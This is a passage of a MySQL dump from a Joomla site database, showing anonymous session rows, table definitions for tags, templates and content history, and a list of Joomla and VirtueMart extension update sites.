'634977467fe207a81899e59e0a8d6bf6',0,1,1782326819,'joomla|s:668:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aTo2NjtzOjU6InRpbWVyIjtPOjg6InN0ZENsYXNzIjozOntzOjU6InN0YXJ0IjtpOjE3ODIzMjY3ODk7czo0OiJsYXN0IjtpOjE3ODIzMjY4MTk7czozOiJub3ciO2k6MTc4MjMyNjgxOTt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),(_binary '0ff71063114bf14361c457fa4ec69527',0,1,1782326821,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToyO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTc4MjMyNjgyMTtzOjQ6Imxhc3QiO2k6MTc4MjMyNjgyMTtzOjM6Im5vdyI7aToxNzgyMzI2ODIxO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 'ead44092ad6529f6158bdb471499e1ab',0,1,1782326873,'joomla|s:668:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxMDY7czo1OiJ0aW1lciI7Tzo4OiJzdGRDbGFzcyI6Mzp7czo1OiJzdGFydCI7aToxNzgyMzI2ODIxO3M6NDoibGFzdCI7aToxNzgyMzI2ODcyO3M6Mzoibm93IjtpOjE3ODIzMjY4NzI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";',0,''),(_binary 'c6b770ba66a05f29846e13ae36edcf28',0,1,1782326874,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToyO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTc4MjMyNjg3MztzOjQ6Imxhc3QiO2k6MTc4MjMyNjg3MztzOjM6Im5vdyI7aToxNzgyMzI2ODc0O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 'ff3fc146b9c9eeaa8a3612264dcf2380',0,1,1782326900,'joomla|s:668:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aTo1NDtzOjU6InRpbWVyIjtPOjg6InN0ZENsYXNzIjozOntzOjU6InN0YXJ0IjtpOjE3ODIzMjY4NzM7czo0OiJsYXN0IjtpOjE3ODIzMjY4OTk7czozOiJub3ciO2k6MTc4MjMyNjkwMDt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,'');
/*!40000 ALTER TABLE `fz6t4_session` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_tags`
--

DROP TABLE IF EXISTS `fz6t4_tags`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_tags` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `parent_id` int unsigned NOT NULL DEFAULT '0',
  `lft` int NOT NULL DEFAULT '0',
  `rgt` int NOT NULL DEFAULT '0',
  `level` int unsigned NOT NULL DEFAULT '0',
  `path` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `title` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `note` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access` int unsigned NOT NULL DEFAULT '0',
  `params` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` varchar(1024) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The meta description for the page.',
  `metakey` varchar(1024) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The meta keywords for the page.',
  `metadata` varchar(2048) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded metadata properties.',
  `created_user_id` int unsigned NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by_alias` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified_user_id` int unsigned NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `images` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `urls` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `hits` int unsigned NOT NULL DEFAULT '0',
  `language` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `version` int unsigned NOT NULL DEFAULT '1',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `tag_idx` (`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_left_right` (`lft`,`rgt`),
  KEY `idx_language` (`language`),
  KEY `idx_path` (`path`(100)),
  KEY `idx_alias` (`alias`(100))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_tags`
--

LOCK TABLES `fz6t4_tags` WRITE;
/*!40000 ALTER TABLE `fz6t4_tags` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_tags` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_template_styles`
--

DROP TABLE IF EXISTS `fz6t4_template_styles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_template_styles` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `template` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `client_id` tinyint unsigned NOT NULL DEFAULT '0',
  `home` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0',
  `title` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `params` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `inheritable` tinyint NOT NULL DEFAULT '0',
  `parent` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `idx_template` (`template`),
  KEY `idx_client_id` (`client_id`),
  KEY `idx_client_id_home` (`client_id`,`home`)
) ENGINE=MyISAM AUTO_INCREMENT=121 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_template_styles`
--

LOCK TABLES `fz6t4_template_styles` WRITE;
/*!40000 ALTER TABLE `fz6t4_template_styles` DISABLE KEYS */;
INSERT INTO `fz6t4_template_styles` VALUES (2,'bluestork',1,'0','Bluestork - Default','{\"useRoundedCorners\":\"1\",\"showSiteName\":\"0\"}',0,''),(3,'atomic',0,'0','Atomic - Default','{}',0,''),(4,'beez_20',0,'0','Beez2 - Default','{\"wrapperSmall\":53,\"wrapperLarge\":72,\"logo\":\"images\\/logo\\/logo-3S.JPG\",\"sitetitle\":\"3S Technologies\",\"sitedescription\":\"\",\"navposition\":\"left\",\"templatecolor\":\"personal\"}',0,''),(5,'hathor',1,'0','Hathor - Default','{\"showSiteName\":\"0\",\"logoFile\":\"\",\"colourChoice\":\"\",\"boldText\":\"0\"}',0,''),(6,'beez5',0,'0','Beez5 - Default','{\"wrapperSmall\":53,\"wrapperLarge\":72,\"logo\":\"images\\/logo\\/logo-3S.JPG\",\"sitetitle\":\"3S Technologies\",\"sitedescription\":\"\",\"navposition\":\"left\",\"html5\":0}',0,''),(114,'beez_20',0,'0','Beez2 - Parks Site','{\"wrapperSmall\":53,\"wrapperLarge\":72,\"logo\":\"\",\"sitetitle\":\"Australian Parks\",\"sitedescription\":\"Parks Sample Site\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}',0,''),(115,'beez5',0,'1','Beez5 - Modifiye','{\"wrapperSmall\":53,\"wrapperLarge\":72,\"logo\":\"images\\/logo\\/logo-3S.JPG\",\"sitetitle\":\"3S Technologies\",\"sitedescription\":\"\",\"navposition\":\"left\",\"html5\":0}',0,''),(116,'beez3',0,'0','beez3 - Default','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\",\"backgroundcolor\":\"#eee\"}',0,''),(117,'isis',1,'1','Isis Administrator template - Default','{\"templateColor\":\"#10223e\",\"headerColor\":\"#1a3867\",\"sidebarColor\":\"#3071a9\",\"linkColor\":\"#3071a9\",\"loginBackgroundColor\":\"#17568c\",\"logoFile\":\"\",\"loginLogoFile\":\"\",\"admin_menus\":1,\"displayHeader\":1,\"statusFixed\":1,\"stickyToolbar\":1}',0,''),(118,'protostar',0,'0','protostar - Default','{\"templateColor\":\"#08C\",\"templateBackgroundColor\":\"#F4F6F7\",\"logoFile\":\"\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}',0,''),(119,'jf_muoti',0,'0','Varsayılan - jf_muoti','{\"logoOption\":\"\",\"logoFile\":\"\",\"logoText\":\"MUOTI\",\"backgroundColor\":\"\",\"googleFont\":\"\",\"templateColor\":\"#00aeef\",\"homepageLayout\":\"\",\"social\":\"1\",\"twitterIcon\":\"1\",\"twitterLink\":\"\",\"facebookIcon\":\"1\",\"facebookLink\":\"\",\"googleIcon\":\"1\",\"googleLink\":\"\",\"linkedInIcon\":\"1\",\"linkedInLink\":\"\",\"vimeoIcon\":\"1\",\"vimeoLink\":\"\",\"pinterestIcon\":\"1\",\"pinterestLink\":\"\",\"copyright\":\"\\u00a9 Copyright 2017.\",\"map\":\"1\",\"latitude\":\"40.790278\",\"longitude\":\"-73.959722\"}',0,''),(120,'jf_couda',0,'0','Varsayılan - jf_couda','{\"logoOption\":\"\",\"logoFile\":\"\",\"logoText\":\"COUDA\",\"backgroundColor\":\"\",\"googleFont\":\"\",\"templateColor\":\"#00aeef\",\"social\":\"1\",\"twitterIcon\":\"1\",\"twitterLink\":\"\",\"facebookIcon\":\"1\",\"facebookLink\":\"\",\"pinterestIcon\":\"1\",\"pinterestLink\":\"\",\"instagramIcon\":\"1\",\"instagramLink\":\"\",\"dribbbleIcon\":\"1\",\"dribbbleLink\":\"\",\"copyright\":\"Copyright 2016\",\"map\":\"1\",\"latitude\":\"40.790278\",\"longitude\":\"-73.959722\"}',0,'');
/*!40000 ALTER TABLE `fz6t4_template_styles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_ucm_base`
--

DROP TABLE IF EXISTS `fz6t4_ucm_base`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_ucm_base` (
  `ucm_id` int unsigned NOT NULL,
  `ucm_item_id` int NOT NULL,
  `ucm_type_id` int NOT NULL,
  `ucm_language_id` int NOT NULL,
  PRIMARY KEY (`ucm_id`),
  KEY `idx_ucm_item_id` (`ucm_item_id`),
  KEY `idx_ucm_type_id` (`ucm_type_id`),
  KEY `idx_ucm_language_id` (`ucm_language_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_ucm_base`
--

LOCK TABLES `fz6t4_ucm_base` WRITE;
/*!40000 ALTER TABLE `fz6t4_ucm_base` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_ucm_base` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_ucm_content`
--

DROP TABLE IF EXISTS `fz6t4_ucm_content`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_ucm_content` (
  `core_content_id` int unsigned NOT NULL AUTO_INCREMENT,
  `core_type_alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'FK to the content types table',
  `core_title` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `core_body` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `core_state` tinyint(1) NOT NULL DEFAULT '0',
  `core_checked_out_time` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_checked_out_user_id` int unsigned NOT NULL DEFAULT '0',
  `core_access` int unsigned NOT NULL DEFAULT '0',
  `core_params` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `core_featured` tinyint unsigned NOT NULL DEFAULT '0',
  `core_metadata` varchar(2048) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'JSON encoded metadata properties.',
  `core_created_user_id` int unsigned NOT NULL DEFAULT '0',
  `core_created_by_alias` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_modified_user_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'Most recent user that modified',
  `core_modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_language` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_content_item_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'ID from the individual type table',
  `asset_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `core_images` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `core_urls` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `core_hits` int unsigned NOT NULL DEFAULT '0',
  `core_version` int unsigned NOT NULL DEFAULT '1',
  `core_ordering` int NOT NULL DEFAULT '0',
  `core_metakey` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `core_metadesc` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `core_catid` int unsigned NOT NULL DEFAULT '0',
  `core_xreference` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'A reference to enable linkages to external data sets.',
  `core_type_id` int unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`core_content_id`),
  KEY `tag_idx` (`core_state`,`core_access`),
  KEY `idx_access` (`core_access`),
  KEY `idx_language` (`core_language`),
  KEY `idx_modified_time` (`core_modified_time`),
  KEY `idx_created_time` (`core_created_time`),
  KEY `idx_core_modified_user_id` (`core_modified_user_id`),
  KEY `idx_core_checked_out_user_id` (`core_checked_out_user_id`),
  KEY `idx_core_created_user_id` (`core_created_user_id`),
  KEY `idx_core_type_id` (`core_type_id`),
  KEY `idx_alias` (`core_alias`(100)),
  KEY `idx_title` (`core_title`(100)),
  KEY `idx_content_type` (`core_type_alias`(100))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Contains core content data in name spaced fields';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_ucm_content`
--

LOCK TABLES `fz6t4_ucm_content` WRITE;
/*!40000 ALTER TABLE `fz6t4_ucm_content` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_ucm_content` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_ucm_history`
--

DROP TABLE IF EXISTS `fz6t4_ucm_history`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_ucm_history` (
  `version_id` int unsigned NOT NULL AUTO_INCREMENT,
  `ucm_item_id` int unsigned NOT NULL,
  `ucm_type_id` int unsigned NOT NULL,
  `version_note` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Optional version name',
  `save_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor_user_id` int unsigned NOT NULL DEFAULT '0',
  `character_count` int unsigned NOT NULL DEFAULT '0' COMMENT 'Number of characters in this version.',
  `sha1_hash` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'SHA1 hash of the version_data column.',
  `version_data` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'json-encoded string of version data',
  `keep_forever` tinyint NOT NULL DEFAULT '0' COMMENT '0=auto delete; 1=keep',
  PRIMARY KEY (`version_id`),
  KEY `idx_ucm_item_id` (`ucm_type_id`,`ucm_item_id`),
  KEY `idx_save_date` (`save_date`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_ucm_history`
--

LOCK TABLES `fz6t4_ucm_history` WRITE;
/*!40000 ALTER TABLE `fz6t4_ucm_history` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_ucm_history` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_update_categories`
--

DROP TABLE IF EXISTS `fz6t4_update_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_update_categories` (
  `categoryid` int NOT NULL AUTO_INCREMENT,
  `name` varchar(20) DEFAULT '',
  `description` text NOT NULL,
  `parent` int DEFAULT '0',
  `updatesite` int DEFAULT '0',
  PRIMARY KEY (`categoryid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Update Categories';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_update_categories`
--

LOCK TABLES `fz6t4_update_categories` WRITE;
/*!40000 ALTER TABLE `fz6t4_update_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_update_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_update_sites`
--

DROP TABLE IF EXISTS `fz6t4_update_sites`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_update_sites` (
  `update_site_id` int NOT NULL AUTO_INCREMENT,
  `name` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '',
  `type` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '',
  `location` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `enabled` int DEFAULT '0',
  `last_check_timestamp` bigint DEFAULT '0',
  `extra_query` varchar(1000) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '',
  PRIMARY KEY (`update_site_id`)
) ENGINE=MyISAM AUTO_INCREMENT=166 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Update Sites';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_update_sites`
--

LOCK TABLES `fz6t4_update_sites` WRITE;
/*!40000 ALTER TABLE `fz6t4_update_sites` DISABLE KEYS */;
INSERT INTO `fz6t4_update_sites` VALUES (1,'Joomla Core','collection','https://update.joomla.org/core/list.xml',1,1728280864,''),(2,'Joomla Extension Directory','collection','http://update.joomla.org/jed/list.xml',1,1728280864,''),(145,'VirtueMart3 MOD_VMENU Update Site','extension','http://virtuemart.net/releases/vm3/mod_vmmenu_update.xml',1,1728280864,''),(70,'Joomla! Update Component Update Site','extension','https://update.joomla.org/core/extensions/com_joomlaupdate.xml',1,1728281225,''),(144,'VirtueMart3 plg_search_virtuemart Update Site','extension','http://virtuemart.net/releases/vm3/plg_search_virtuemart_update.xml',1,1728280865,''),(143,'VirtueMart3 plg_vmcalculation_avalara Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmcalculation_avalara_update.xml',1,1728280865,''),(142,'VirtueMart3 plg_vmcustom_specification Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmcustom_specification_update.xml',0,0,''),(141,'VirtueMart3 plg_vmcustom_textinput Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmcustom_textinput_update.xml',1,1728280865,''),(140,'VirtueMart3 plg_vmshipment_weight_countries Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmshipment_weight_countries_update.xml',1,1728280865,''),(139,'VirtueMart plg_vmpayment_sofort_ideal Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_sofort_ideal_update.xml',1,1728280865,''),(138,'VirtueMart plg_vmpayment_authorizenet Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_authorisenet_update.xml',1,1728280865,''),(137,'VirtueMart plg_vmuserfield_realex_hpp_api Update Site','extension','\n            http://virtuemart.net/releases/vm3/plg_vmuserfield_realex_hpp_api_update.xml',0,0,''),(136,'VirtueMart plg_vmpayment_realex_hpp_api Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_realex_hpp_api_update.xml',1,1728280865,''),(135,'VirtueMart plg_system_amazon Update Site','extension','http://virtuemart.net/releases/vm3/plg_system_amazon_update.xml',1,1728280865,''),(134,'VirtueMart plg_vmpayment_amazon Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_amazon_update.xml',1,1728280865,''),(133,'VirtueMart plg_vmpayment_heidelpay Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_heidelpay_update.xml',1,1728280866,''),(132,'VirtueMart plg_vmpayment_sofort Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_sofort_update.xml',1,1728280866,''),(131,'VirtueMart plg_vmpayment_klarnacheckout Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_klarnacheckout_update.xml',1,1728280866,''),(159,'FOF 3.x','extension','http://cdn.akeeba.com/updates/fof3_file.xml',1,1728280866,''),(151,'FOF 3.x','extension','http://cdn.akeebabackup.com/updates/fof3_file.xml',0,0,''),(126,'VirtueMart3 Update Site','extension','http://virtuemart.net/releases/vm3/virtuemart_update.xml',1,1728280866,''),(124,'WebInstaller Update Site','extension','https://appscdn.joomla.org/webapps/jedapps/webinstaller.xml',0,0,''),(125,'VirtueMart3 AIO Update Site','extension','http://virtuemart.net/releases/vm3/virtuemart_aio_update.xml',1,1728280866,''),(123,'VirtueMart3 plg_vmpayment_tco Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_tco_update.xml',1,1728280866,''),(122,'VirtueMart3 plg_vmpayment_skrill Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_skrill_update.xml',1,1728280866,''),(121,'VirtueMart plg_vmpayment_paybox Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_paybox_update.xml',1,1728280866,''),(120,'VirtueMart plg_vmpayment_paypal Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_paypal_update.xml',0,0,''),(119,'VirtueMart plg_vmpayment_klikandpay Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_klikandpay_update.xml',1,1728280867,''),(118,'VM Framework Loader during Plugin Updates','extension','http://virtuemart.net/releases/vm3/plg_system_vmLoaderPluginUpdate_update.xml',0,0,''),(117,'Plugin Googlemap Update Site','extension','http://tech.reumer.net/update/plugin_googlemap3/extension.xml',0,0,''),(115,'VirtueMart3 mod_virtuemart_currencies Update Site','extension','http://virtuemart.net/releases/vm3/mod_virtuemart_currencies_update.xml',0,0,''),(116,'eorisis: Google Analytics','extension','https://eorisis.com/updates/eorisis-google-analytics/extension.xml',0,0,''),(129,'VirtueMart plg_vmpayment_standard Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_standard_update.xml',1,1728280867,''),(110,'VirtueMart3 mod_virtuemart_search Update Site','extension','http://virtuemart.net/releases/vm3/mod_virtuemart_search_update.xml',0,0,''),(111,'VirtueMart3 mod_virtuemart_cart Update Site','extension','http://virtuemart.net/releases/vm3/mod_virtuemart_cart_update.xml',0,0,''),(112,'VirtueMart3 mod_virtuemart_category Update 